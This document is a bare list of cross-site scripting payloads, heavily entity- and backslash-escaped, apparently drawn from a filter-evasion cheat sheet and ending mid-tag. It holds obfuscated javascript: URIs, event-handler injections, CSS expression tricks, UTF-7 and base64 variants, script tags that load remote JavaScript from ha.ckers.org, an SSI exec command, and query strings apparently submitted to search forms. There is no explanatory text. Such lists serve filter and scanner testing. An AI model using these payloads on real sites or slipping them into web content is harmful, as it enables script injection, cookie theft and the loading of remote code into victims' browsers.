SRC=jav&amp;#x09;ascript:alert(XSS);&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(XSS);//&lt;&lt;/SCRIPT&gt;\\r\\n%253cscript%253ealert(1)%253c/script%253e\\r\\n&gt;&lt;s%2bcript&gt;alert(document.cookie)&lt;/script&gt;\\r\\nfoo&lt;script&gt;alert(1)&lt;/script&gt;\\r\\n&lt;scr&lt;script&gt;ipt&gt;alert(1)&lt;/scr&lt;/script&gt;ipt&gt;\\r\\n&lt;IMG SRC=&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;&amp;#58;&amp;#97;&amp;#108;&amp;#101;&amp;#114;&amp;#116;&amp;#40;&amp;#39;&amp;#88;&amp;#83;&amp;#83;&amp;#39;&amp;#41;&gt;\\r\\n&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;\\r\\n&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;\\r\\n&lt;BODY BACKGROUND=javascript:alert(XSS)&gt;\\r\\n&lt;BODY ONLOAD=alert(XSS)&gt;\\r\\n&lt;INPUT TYPE=IMAGE SRC=javascript:alert(XSS);&gt;\\r\\n&lt;IMG SRC=javascript:alert(XSS)\\r\\n&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;\\r\\njavascript:alert(\\\&quot;hellox worldss\\\&quot;)\\r\\n&lt;img src=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;\\r\\n&lt;img src=javascript:alert(&amp;quot;XSS&amp;quot;)&gt;\\r\\n&lt;\\\&quot;\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n&lt;META HTTP-EQUIV=\\\&quot;refresh\\\&quot; CONTENT=\\\&quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\&quot;&gt;\\r\\n&lt;IFRAME SRC=\\\&quot;javascript:alert(\\\&#039;XSS\\\&#039;);\\\&quot;&gt;&lt;/IFRAME&gt;\\r\\n&lt;EMBED SRC=\\\&quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\&quot; type=\\\&quot;image/svg+xml\\\&quot; AllowScriptAccess=\\\&quot;always\\\&quot;&gt;&lt;/EMBED&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&quot; \\\&#039;\\\&#039; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT \\\&quot;a=\\\&#039;&gt;\\\&#039;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT a=\\\&quot;&gt;\\\&#039;&gt;\\\&quot; SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;SCRIPT&gt;document.write(\\\&quot;&lt;SCRI\\\&quot;);&lt;/SCRIPT&gt;PT SRC=\\\&quot;http://ha.ckers.org/xss.js\\\&quot;&gt;&lt;/SCRIPT&gt;\\r\\n&lt;&lt;SCRIPT&gt;alert(\\\&quot;XSS\\\&quot;);//&lt;&lt;/SCRIPT&gt;\\r\\n&lt;\\\&quot;\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;\\r\\n\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;?/SCRIPT&gt;&amp;submit.x=27&amp;submit.y=9&amp;cmd=search\\r\\n&lt;script&gt;alert(\\\&quot;hellox worldss\\\&quot;)&lt;/script&gt;&amp;safe=high&amp;cx=006665157904466893121:su_tzknyxug&amp;cof=FORID:9#510\\r\\n&lt;script&gt;alert(\\\&quot;XSS\\\&quot;);&lt;/script&gt;&amp;search=1\\r\\n0&amp;q=\\\&#039;;alert(String.fromCharCode(88,83,83))//\\\\\\\&#039;;alert%2?8String.fromCharCode(88,83,83))//\\\&quot;;alert(String.fromCharCode?(88,83,83))//\\\\\\\&quot;;alert(String.fromCharCode(88,83,83)%?29//--&gt;&lt;/SCRIPT&gt;\\\&quot;&gt;\\\&#039;&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83%?2C83))&lt;/SCRIPT&gt;&amp;submit-frmGoogleWeb=Web+Search\\r\\n&lt;h1&gt;&lt;font color=blue&gt;hellox worldss&lt;/h1&gt;\\r\\n&lt;BODY ONLOAD=alert(\\\&#039;hellox worldss\\\&#039;)&gt;\\r\\n&lt;input onfocus=write(XSS) autofocus&gt;\\r\\n&lt;input onblur=write(XSS) autofocus&gt;&lt;input autofocus&gt;\\r\\n&lt;body onscroll=alert(XSS)&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;...&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;input autofocus&gt;\\r\\n&lt;form&gt;&lt;button formaction=\\\&quot;javascript:alert(XSS)\\\&quot;&gt;lol\\r\\n&lt;!--&lt;img src=\\\&quot;--&gt;&lt;img src=x onerror=alert(XSS)//\\\&quot;&gt;\\r\\n&lt;![&gt;&lt;img src=\\\&quot;]&gt;&lt;img src=x onerror=alert(XSS)//\\\&quot;&gt;\\r\\n&lt;style&gt;&lt;img src=\\\&quot;&lt;/style&gt;&lt;img src=x onerror=alert(XSS)//\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;/ foo=\\\&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;? foo=\\\&quot;&gt;&lt;x foo=\\\&#039;?&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&#039;&gt;\\\&quot;&gt;\\r\\n&lt;! foo=\\\&quot;[[[Inception]]\\\&quot;&gt;&lt;x foo=\\\&quot;]foo&gt;&lt;script&gt;alert(1)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;% foo&gt;&lt;x foo=\\\&quot;%&gt;&lt;script&gt;alert(123)&lt;/script&gt;\\\&quot;&gt;\\r\\n&lt;div style=\\\&quot;font-family:\\\&#039;foo&amp;#10;;color:red;\\\&#039;;\\\&quot;&gt;LOL\\r\\nLOL&lt;style&gt;*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari*[0]/color:green;color:bl/*IE*/ue;}&lt;/style&gt;\\r\\n&lt;script&gt;({0:#0=alert/#0#/#0#(0)})&lt;/script&gt;\\r\\n&lt;svg xmlns=\\\&quot;http://www.w3.org/2000/svg\\\&quot;&gt;LOL&lt;script&gt;alert(123)&lt;/script&gt;&lt;/svg&gt;\\r\\n&amp;lt;SCRIPT&amp;gt;alert(/XSS/&amp;#46;source)&amp;lt;/SCRIPT&amp;gt;\\r\\n\\\\\\\\\\\&quot;;alert(\\\&#039;XSS\\\&#039;);//\\r\\n&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;);&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;INPUT TYPE=\\\\\\\&quot;IMAGE\\\\\\\&quot; SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BODY BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BODY ONLOAD=alert(\\\&#039;XSS\\\&#039;)&amp;gt;\\r\\n&amp;lt;IMG DYNSRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG LOWSRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BGSOUND SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;BR SIZE=\\\\\\\&quot;&amp;{alert(\\\&#039;XSS\\\&#039;)}\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;LAYER SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\\\\\\\&quot;&amp;gt;&amp;lt;/LAYER&amp;gt;\\r\\n&amp;lt;LINK REL=\\\\\\\&quot;stylesheet\\\\\\\&quot; HREF=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;LINK REL=\\\\\\\&quot;stylesheet\\\\\\\&quot; HREF=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@import\\\&#039;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css\\\&#039;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;Link\\\\\\\&quot; Content=\\\\\\\&quot;&amp;lt;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;css&amp;gt;; REL=stylesheet\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;BODY{-moz-binding&amp;#58;url(\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xssmoz&amp;#46;xml#xss\\\\\\\&quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;XSS STYLE=\\\\\\\&quot;behavior&amp;#58; url(xss&amp;#46;htc);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;li {list-style-image&amp;#58; url(\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS\\r\\n&amp;lt;IMG SRC=\\\&#039;vbscript&amp;#058;msgbox(\\\\\\\&quot;XSS\\\\\\\&quot;)\\\&#039;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;mocha&amp;#58;&amp;#91;code&amp;#93;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;livescript&amp;#058;&amp;#91;code&amp;#93;\\\\\\\&quot;&amp;gt;\\r\\nscriptualert(EXSSE)/scriptu\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0;url=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0;url=data&amp;#58;text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;refresh\\\\\\\&quot; CONTENT=\\\\\\\&quot;0; URL=http&amp;#58;//;URL=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;\\r\\n&amp;lt;IFRAME SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;\\r\\n&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;\\r\\n&amp;lt;TABLE BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58; url(javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;))\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58;\\\\0075\\\\0072\\\\006C\\\\0028\\\&#039;\\\\006a\\\\0061\\\\0076\\\\0061\\\\0073\\\\0063\\\\0072\\\\0069\\\\0070\\\\0074\\\\003a\\\\0061\\\\006c\\\\0065\\\\0072\\\\0074\\\\0028&amp;#46;1027\\\\0058&amp;#46;1053\\\\0053\\\\0027\\\\0029\\\&#039;\\\\0029\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;background-image&amp;#58; url(javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;))\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;DIV STYLE=\\\\\\\&quot;width&amp;#58; expression(alert(\\\&#039;XSS\\\&#039;));\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;@im\\\\port\\\&#039;\\\\ja\\\\vasc\\\\ript&amp;#58;alert(\\\\\\\&quot;XSS\\\\\\\&quot;)\\\&#039;;&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;IMG STYLE=\\\\\\\&quot;xss&amp;#58;expr/*XSS*/ession(alert(\\\&#039;XSS\\\&#039;))\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;XSS STYLE=\\\\\\\&quot;xss&amp;#58;expression(alert(\\\&#039;XSS\\\&#039;))\\\\\\\&quot;&amp;gt;\\r\\nexp/*&amp;lt;A STYLE=\\\&#039;no\\\\xss&amp;#58;noxss(\\\\\\\&quot;*//*\\\\\\\&quot;);\\r\\nxss&amp;#58;ex&amp;#x2F;*XSS*//*/*/pression(alert(\\\\\\\&quot;XSS\\\\\\\&quot;))\\\&#039;&amp;gt;\\r\\n&amp;lt;STYLE TYPE=\\\\\\\&quot;text/javascript\\\\\\\&quot;&amp;gt;alert(\\\&#039;XSS\\\&#039;);&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;STYLE&amp;gt;&amp;#46;XSS{background-image&amp;#58;url(\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;\\r\\n&amp;lt;STYLE type=\\\\\\\&quot;text/css\\\\\\\&quot;&amp;gt;BODY{background&amp;#58;url(\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;)}&amp;lt;/STYLE&amp;gt;\\r\\n&amp;lt;!--&amp;#91;if gte IE 4&amp;#93;&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;alert(\\\&#039;XSS\\\&#039;);&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;!&amp;#91;endif&amp;#93;--&amp;gt;\\r\\n&amp;lt;BASE HREF=\\\\\\\&quot;javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;);//\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;OBJECT TYPE=\\\\\\\&quot;text/x-scriptlet\\\\\\\&quot; DATA=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/scriptlet&amp;#46;html\\\\\\\&quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;OBJECT classid=clsid&amp;#58;ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript&amp;#058;alert(\\\&#039;XSS\\\&#039;)&amp;gt;&amp;lt;/OBJECT&amp;gt;\\r\\n&amp;lt;EMBED SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;swf\\\\\\\&quot; AllowScriptAccess=\\\\\\\&quot;always\\\\\\\&quot;&amp;gt;&amp;lt;/EMBED&amp;gt;\\r\\n&amp;lt;EMBED SRC=\\\\\\\&quot;data&amp;#58;image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==\\\\\\\&quot; type=\\\\\\\&quot;image/svg+xml\\\\\\\&quot; AllowScriptAccess=\\\\\\\&quot;always\\\\\\\&quot;&amp;gt;&amp;lt;/EMBED&amp;gt;\\r\\na=\\\\\\\&quot;get\\\\\\\&quot;;\\r\\nb=\\\\\\\&quot;URL(\\\\\\\\\\\&quot;\\\\\\\&quot;;\\r\\nc=\\\\\\\&quot;javascript&amp;#058;\\\\\\\&quot;;\\r\\nd=\\\\\\\&quot;alert(\\\&#039;XSS\\\&#039;);\\\\\\\\\\\&quot;)\\\\\\\&quot;;\\r\\neval(a+b+c+d);\\r\\n&amp;lt;HTML xmlns&amp;#58;xss&amp;gt;&amp;lt;?import namespace=\\\\\\\&quot;xss\\\\\\\&quot; implementation=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;htc\\\\\\\&quot;&amp;gt;&amp;lt;xss&amp;#58;xss&amp;gt;XSS&amp;lt;/xss&amp;#58;xss&amp;gt;&amp;lt;/HTML&amp;gt;\\r\\n&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;&amp;lt;IMG SRC=\\\\\\\&quot;javas&amp;#93;&amp;#93;&amp;gt;&amp;lt;!&amp;#91;CDATA&amp;#91;cript&amp;#58;alert(\\\&#039;XSS\\\&#039;);\\\\\\\&quot;&amp;gt;&amp;#93;&amp;#93;&amp;gt;\\r\\n&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;XML ID=\\\\\\\&quot;xss\\\\\\\&quot;&amp;gt;&amp;lt;I&amp;gt;&amp;lt;B&amp;gt;&amp;lt;IMG SRC=\\\\\\\&quot;javas&amp;lt;!-- --&amp;gt;cript&amp;#58;alert(\\\&#039;XSS\\\&#039;)\\\\\\\&quot;&amp;gt;&amp;lt;/B&amp;gt;&amp;lt;/I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;SPAN DATASRC=\\\\\\\&quot;#xss\\\\\\\&quot; DATAFLD=\\\\\\\&quot;B\\\\\\\&quot; DATAFORMATAS=\\\\\\\&quot;HTML\\\\\\\&quot;&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;XML SRC=\\\\\\\&quot;xsstest&amp;#46;xml\\\\\\\&quot; ID=I&amp;gt;&amp;lt;/XML&amp;gt;\\r\\n&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;\\r\\n&amp;lt;HTML&amp;gt;&amp;lt;BODY&amp;gt;\\r\\n&amp;lt;?xml&amp;#58;namespace prefix=\\\\\\\&quot;t\\\\\\\&quot; ns=\\\\\\\&quot;urn&amp;#58;schemas-microsoft-com&amp;#58;time\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;?import namespace=\\\\\\\&quot;t\\\\\\\&quot; implementation=\\\\\\\&quot;#default#time2\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;t&amp;#58;set attributeName=\\\\\\\&quot;innerHTML\\\\\\\&quot; to=\\\\\\\&quot;XSS&amp;lt;SCRIPT DEFER&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;/BODY&amp;gt;&amp;lt;/HTML&amp;gt;\\r\\n&amp;lt;SCRIPT SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;jpg\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;!--#exec cmd=\\\\\\\&quot;/bin/echo \\\&#039;&amp;lt;SCR\\\&#039;\\\\\\\&quot;--&amp;gt;&amp;lt;!--#exec cmd=\\\\\\\&quot;/bin/echo \\\&#039;IPT SRC=http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\\&#039;\\\\\\\&quot;--&amp;gt;\\r\\n&amp;lt;? echo(\\\&#039;&amp;lt;SCR)\\\&#039;;\\r\\necho(\\\&#039;IPT&amp;gt;alert(\\\\\\\&quot;XSS\\\\\\\&quot;)&amp;lt;/SCRIPT&amp;gt;\\\&#039;); ?&amp;gt;\\r\\n&amp;lt;IMG SRC=\\\\\\\&quot;http&amp;#58;//www&amp;#46;thesiteyouareon&amp;#46;com/somecommand&amp;#46;php?somevariables=maliciouscode\\\\\\\&quot;&amp;gt;\\r\\nRedirect 302 /a&amp;#46;jpg http&amp;#58;//victimsite&amp;#46;com/admin&amp;#46;asp&amp;deleteuser\\r\\n&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;Set-Cookie\\\\\\\&quot; Content=\\\\\\\&quot;USERID=&amp;lt;SCRIPT&amp;gt;alert(\\\&#039;XSS\\\&#039;)&amp;lt;/SCRIPT&amp;gt;\\\\\\\&quot;&amp;gt;\\r\\n&amp;lt;HEAD&amp;gt;&amp;lt;META HTTP-EQUIV=\\\\\\\&quot;CONTENT-TYPE\\\\\\\&quot; CONTENT=\\\\\\\&quot;text/html; charset=UTF-7\\\\\\\&quot;&amp;gt; &amp;lt;/HEAD&amp;gt;+ADw-SCRIPT+AD4-alert(\\\&#039;XSS\\\&#039;);+ADw-/SCRIPT+AD4-\\r\\n&amp;lt;SCRIPT a=\\\\\\\&quot;&amp;gt;\\\\\\\&quot; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT =\\\\\\\&quot;&amp;gt;\\\\\\\&quot; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=\\\\\\\&quot;&amp;gt;\\\\\\\&quot; \\\&#039;\\\&#039; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT \\\\\\\&quot;a=\\\&#039;&amp;gt;\\\&#039;\\\\\\\&quot; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=`&amp;gt;` SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT a=\\\\\\\&quot;&amp;gt;\\\&#039;&amp;gt;\\\\\\\&quot; SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;SCRIPT&amp;gt;document&amp;#46;write(\\\\\\\&quot;&amp;lt;SCRI\\\\\\\&quot;);&amp;lt;/SCRIPT&amp;gt;PT SRC=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org/xss&amp;#46;js\\\\\\\&quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//66&amp;#46;102&amp;#46;7&amp;#46;147/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//1113982867/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//0x42&amp;#46;0x0000066&amp;#46;0x7&amp;#46;0x93/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//0102&amp;#46;0146&amp;#46;0007&amp;#46;00000223/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;htt p&amp;#58;//6 6&amp;#46;000146&amp;#46;0x7&amp;#46;147/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;//www&amp;#46;google&amp;#46;com/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;//google\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//ha&amp;#46;ckers&amp;#46;org@google\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//google&amp;#58;ha&amp;#46;ckers&amp;#46;org\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//google&amp;#46;com/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;http&amp;#58;//www&amp;#46;google&amp;#46;com&amp;#46;/\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A HREF=\\\\\\\&quot;javascript&amp;#058;document&amp;#46;location=\\\&#039;http&amp;#58;//www&amp;#46;google&amp;#46;com/\\\&#039;\\\\\\\&quot;&amp;gt;XSS&amp;lt;/A&amp;gt;\\r\\n&amp;lt;A 